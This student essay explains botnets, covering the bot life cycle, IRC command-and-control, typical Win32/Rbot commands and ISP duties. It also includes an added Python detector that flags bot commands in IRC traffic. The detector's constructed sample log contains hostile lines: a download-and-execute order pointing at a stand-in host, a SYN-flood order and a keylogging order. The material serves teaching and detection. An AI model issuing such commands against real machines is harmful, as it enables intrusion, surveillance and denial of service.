Study On What A Botnet Is Computer Science Essay


This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.

A botnet is a network of compromised computers controlled by a single person or group. The term is a contraction of "robot network": each member runs bot software that performs automated tasks without human intervention. Typically these bots run on Microsoft Windows computers that have been infected with some form of malware. The infected computers communicate with other members of the botnet over the Internet. Most botnets use a distributed design in which the botnet operator gives instructions to only a small number of machines; those machines then relay the instructions to the other compromised machines, usually via IRC. The distributed design makes the controlling computers hard to identify, and the anonymity a botnet affords helps the operator avoid detection and prosecution.

Botnets are useful for tasks that would be impractical with a single computer, a single IP address, or a single Internet connection. Initially, botnets were used mainly to perform distributed denial of service (DDoS) attacks. Many web servers now deploy countermeasures against such attacks, which reduces the effectiveness of this use; in addition, many anti-DDoS strategies blacklist the IP addresses of attacking computers, thereby exposing the botnet's machines. As the spam market became profitable, and since ISPs usually terminate service to subscribers who send spam, botnets were found to be an effective resource for sending spam. Furthermore, many compromised computers contain address books whose e-mail addresses can be added to the list of spam targets. Zombies that are not actively sending spam at a given moment can be configured to crawl the web looking for new e-mail addresses to spam, adding further value to the botnet.

A secondary purpose of a botnet is to locate and compromise additional computers. While this is not a primary purpose in itself, growing the botnet by recruiting new machines helps it carry out its main objectives more effectively, so this secondary purpose is a frequent part of a botnet's workload. Many computer networks, especially those of Microsoft Windows computers running default settings, implicitly trust other computers on the same network, so a single compromised machine on such a network becomes an attack vector against the other machines on it. Other secondary botnet objectives include click fraud on website advertisements, web browser toolbar installation, keylogging, and manipulation of social bookmarking polls [1].

[Figure: Life Cycle of Botnets; image not available in this copy]

Current estimates of the scale of the botnet problem [2]

Statistics for week ending November 14, 2010

[Figures: botnet statistics for the week ending November 14, 2010; images not available in this copy]

The Botnet Life Cycle [3]

The life of a bot client can be described as a sequence of steps. Steps 5 through 8 are iterative and repeat until the command to abandon the client is given.

1) Computer is exploited and becomes a botclient.

2) New botclient rallies to let the bot herder know it has joined the botnet.

3) Retrieve the latest anti-A/V component.

4) Secure the new botclient from A/V, user detection, and other hacker intervention.

5) Listen or subscribe to the C&C server/peer for commands.

6) Retrieve the payload modules.

7) Execute the commands.

8) Report results back to the C&C server.

9) On command, erase all evidence and abandon the client.

How a Botnet Is Controlled

The attacker who gives commands to the botnet is generally referred to as the bot herder or controller. Botnets used to be run by individuals, but in recent years they have become more 'commercialized', and it is thought that many botnets today are in the hands of criminal syndicates.

To control the botnet, the bot herder uses an application known as a client program to issue instructions to the bot programs installed on the zombies. This is very similar to how a backdoor is controlled, and it gives the bot herder great flexibility: commands can be sent to a single zombie, to a subset of zombies, or to the entire botnet.

Using the client, the bot herder can direct a single zombie to carry out a specific action. For example, it can be instructed to send all the e-mail addresses stored on its hard drive to a remote website, where they are added to a spammer's mailing list. Alternatively, all the zombies in the botnet can be commanded to carry out the same routine, such as sending requests to a specific website (in effect, a denial of service or DoS attack).

The connection between the zombies and the client controlling them is known as the command-and-control (C&C) infrastructure. The zombie, website or server that hosts the client is known as the C&C server.

[Figure: simplified view of the C&C infrastructure; image not available in this copy]

Of course, in real life a botnet's organization can be far more complicated. Some botnets use many C&C servers, relying on the redundancy as a form of defence; others have only one C&C server but continually move the client application from machine to machine, also for improved resilience.

Bot herders put all these protective measures in place for one simple reason: the C&C server is the nerve centre of the whole botnet, and also its Achilles' heel.

Controlling the Botnet

To run the bots, bot-herders join the channel like ordinary IRC users and issue specially formatted commands. For some commands, such as those that collect and report information about the victim's computer, the bots post their results as chat messages in the IRC channel or save them locally as files that the herder can retrieve later. Depending on the capabilities of the bot malware, bot-herders can execute a wide range of actions, as described in "How Botnets Are Used". A short selection of typical botnet commands, in this case from the Win32/Rbot family, gives an idea of the kinds of operations a herder can execute:

.capture. Generates and saves an image or video file. Depending on the parameters used, this file could be a screenshot of the victim's desktop or a still image or video from the victim's webcam. The operator can retrieve the saved file using the .get command.

.ddos.syn, .ddos.ack, .ddos.random. Launches a DDoS attack on a specified IP address for a specified length of time.

.download. Downloads a file from a specified URL to the victim's computer and optionally executes it.

.findfile. Searches for files on the victim's computer by name and returns the paths of any files found.

.getcdkeys. Returns product keys for software installed on the victim's computer.

.keylog. Logs the victim's keystrokes and saves them to a file.

.login, .logout. Authenticates the bot-herder with the bots. Before issuing commands to any bots in the channel, the bot-herder must use the .login command with a password that is specified in the bots' configuration data so the bots will recognize the bot-herder as an authorized controller.

.open. Opens a program, an image, or a URL in a web browser.

.procs. Lists the processes running on the victim's computer. Other commands can then be used to kill processes by name or ID.

How Botnets Are Used

A botnet can be used as a platform for a variety of criminal activities, depending on how the bot-herder chooses to configure the individual nodes. In addition to identity theft, botnets have many uses, some of which are listed below.



Denial-of-Service Attacks

Installing Malware

Click Fraud

Stealing Confidential Data

Distributing Malware

Controlling the Botnet

After a bot infects a computer, it resolves the hostname of the C&C server stored in its configuration and opens a connection to it; the connection is initiated from the victim's side, outbound to the server. Once connected, the bot joins the operator's IRC channel as configured in its settings and waits for commands from an authenticated bot-herder.

The commands the attacker uses to act on the victim's computer are the ones listed in the Win32/Rbot example above: .capture, .download, .getcdkeys, .findfile, .ddos.syn/.ddos.ack/.ddos.random and .keylog.
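The following Python detector is an added example, not part of the original essay and not code from any bot family. It parses raw IRC lines the way a network sensor would see them, counts the distinct hosts that join each channel (the "rally" step of the life cycle), and flags the Win32/Rbot-style commands listed above, noting whether the sending nick had previously authenticated with .login in that channel. Only the command prefixes come from the page; the nicks, hosts, channel name, password and log lines are constructed for illustration.

```python
"""Spotting Rbot-style C&C commands in an IRC log (added illustration).

Command names come from the Win32/Rbot list on this page; every nick, host,
channel, password and log line below is constructed and is not a real capture.
"""
import re
from dataclasses import dataclass, field

# Command prefixes from the Win32/Rbot command list, grouped by effect.
BOT_COMMANDS = {
    ".login": "auth",
    ".logout": "auth",
    ".capture": "surveillance",
    ".keylog": "surveillance",
    ".findfile": "recon",
    ".procs": "recon",
    ".getcdkeys": "theft",
    ".download": "malware-install",
    ".open": "malware-install",
}
DDOS_RE = re.compile(r"^\.ddos\.(syn|ack|random)$")

# Raw IRC lines as seen on the wire:
#   ":nick!user@host PRIVMSG #channel :message"
#   ":nick!user@host JOIN :#channel"
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)!\S+@(?P<host>\S+)\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<msg>.*)$"
)
JOIN_RE = re.compile(r"^:(?P<nick>[^!\s]+)!\S+@(?P<host>\S+)\s+JOIN\s+:?(?P<chan>\S+)$")


@dataclass
class Alert:
    nick: str
    host: str
    channel: str
    command: str
    category: str
    authenticated: bool  # had this nick already sent .login in this channel?


@dataclass
class CncDetector:
    # channel -> nicks that have issued .login there (herder candidates)
    herders: dict = field(default_factory=dict)
    # channel -> hosts that joined it (many quiet hosts in one channel is a bot sign)
    members: dict = field(default_factory=dict)

    def classify(self, msg):
        """Return (command, category) if the message starts with a bot command."""
        parts = msg.split()
        if not parts:
            return None, None
        token = parts[0]
        if DDOS_RE.match(token):
            return token, "ddos"
        if token in BOT_COMMANDS:
            return token, BOT_COMMANDS[token]
        return None, None

    def feed(self, line):
        """Consume one raw IRC line; return an Alert for a bot command, else None."""
        line = line.strip()
        j = JOIN_RE.match(line)
        if j:
            self.members.setdefault(j["chan"], set()).add(j["host"])
            return None
        m = PRIVMSG_RE.match(line)
        if not m:
            return None  # PING, MODE, NICK, etc.
        command, category = self.classify(m["msg"])
        if command is None:
            return None  # ordinary chat
        chan_herders = self.herders.setdefault(m["target"], set())
        authenticated = m["nick"] in chan_herders
        if command == ".login":
            chan_herders.add(m["nick"])  # password is visible in the channel message
        elif command == ".logout":
            chan_herders.discard(m["nick"])
        return Alert(m["nick"], m["host"], m["target"], command, category, authenticated)


def scan(lines):
    """Run the detector over a log; return (alerts, distinct hosts per channel)."""
    det = CncDetector()
    alerts = [a for a in (det.feed(ln) for ln in lines) if a is not None]
    sizes = {chan: len(hosts) for chan, hosts in det.members.items()}
    return alerts, sizes


# Constructed sample log (not a real capture).
SAMPLE_LOG = [
    ":b0t1!x@10.0.0.11 JOIN :#botz",
    ":b0t2!x@10.0.0.12 JOIN :#botz",
    ":b0t3!x@10.0.0.13 JOIN :#botz",
    ":h3rd3r!x@10.0.0.5 JOIN :#botz",
    ":h3rd3r!x@10.0.0.5 PRIVMSG #botz :.login s3cret",
    ":h3rd3r!x@10.0.0.5 PRIVMSG #botz :.ddos.syn 203.0.113.7 600",
    ":h3rd3r!x@10.0.0.5 PRIVMSG #botz :.download http://example.invalid/upd.exe 1",
    ":alice!a@192.0.2.9 PRIVMSG #chat :hey, anyone around?",
    ":mallory!m@192.0.2.4 PRIVMSG #botz :.keylog on",
    "PING :irc.example.invalid",
    ":h3rd3r!x@10.0.0.5 PRIVMSG #botz :.logout",
]

if __name__ == "__main__":
    alerts, sizes = scan(SAMPLE_LOG)
    for a in alerts:
        flag = "AUTH" if a.authenticated else "unauth"
        print(f"{a.channel} {a.nick}@{a.host} {a.command} [{a.category}, {flag}]")
    print("distinct hosts per channel:", sizes)
```

Running the block prints one line per flagged command. The .login tracking works only because the password travels as an ordinary channel message, which is the same property that lets a sensor read it; cleartext IRC command traffic is easy to spot on the wire, which is one reason the text above calls the C&C server the botnet's Achilles' heel.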







Internet Service Providers

The internet economy is highly reliant on information and network security.

Estimates of the direct damage caused by internet security incidents vary widely, but typically range in the tens of billions of US dollars per year for the U.S. alone (e.g., US GAO 2007; Bauer et al. 2008). In addition, all stakeholders in the information and communication system incur indirect costs of possibly even larger magnitude, including the costs of prevention. While this damage is related to a wide variety of threats, the rise of malicious software (malware) and botnets is seen as a, if not the, most urgent security threat we currently face.

ISPs should not disclose confidential customer information. They should not expose other users' usernames and passwords, nor highly sensitive data such as credit card numbers, PINs, phone numbers and addresses.

They should not rely on weak antivirus products or weak firewalls, which increase the likelihood of successful attacks.

ISPs should keep customer information strictly confidential.

ISPs should use strong, up-to-date antivirus software and maintain a range of countermeasures.

When security concerns arise about the information being exchanged over a connection, the ISP should block that connection and not restore it until the problem has been rectified.
